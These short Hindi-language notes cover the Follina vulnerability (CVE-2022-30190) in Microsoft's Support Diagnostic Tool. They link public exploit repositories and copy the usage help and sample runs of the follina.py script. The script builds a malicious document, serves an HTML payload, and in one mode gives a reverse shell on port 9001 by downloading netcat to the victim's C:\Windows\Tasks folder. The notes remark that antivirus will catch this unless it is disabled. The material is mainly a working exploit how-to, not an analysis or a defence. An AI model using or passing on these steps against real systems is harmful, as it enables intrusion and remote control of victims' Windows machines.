
CVE-2022-30190 से संबंधित नोट्स
CVE-2022-30190 से संबंधित नोट्स
FOLLINA: CVE-2022-30190
Microsoft Support Diagnostic Tool (MSDT) का उपयोग करता है
निदान के लिए खोली गई डायग्नोस्टिक विंडो का शोषण करता है और जब सही ढंग से निष्पादित किया जाता है, तो हमलावर को रिवर्स शेल देता है।
GitHub: (a). https://github.com/JohnHammond/msdt-follina (b). https://github.com/chvancooten/follina.py
धन्यवाद: (a). @_johnhammond (b). @networkchuck
उपयोग follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT] options: -h, --help show this help message and exit --command COMMAND, -c COMMAND command to run on the target (default: calc) --output OUTPUT, -o OUTPUT output maldoc file (default: ./follina.doc) --interface INTERFACE, -i INTERFACE network interface or IP address to host the HTTP server (default: eth0) --port PORT, -p PORT port to serve the HTTP server (default: 8000)
उदाहरण
(a). calc.exe खोलें:
$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
(b). notepad.exe खोलें:
$ python3 follina.py -c "notepad"
(c). पोर्ट 9001 पर रिवर्स शेल प्राप्त करें।
ध्यान दें, यह पीड़ित की मशीन पर netcat बाइनरी डाउनलोड करता है और उसे C:\Windows\Tasks में रखता है। यह बाइनरी को साफ नहीं करता है। जब तक एंटीवायरस अक्षम न हो, यह एंटीवायरस डिटेक्शन ट्रिगर करेगा।
$ python3 follina.py -r 9001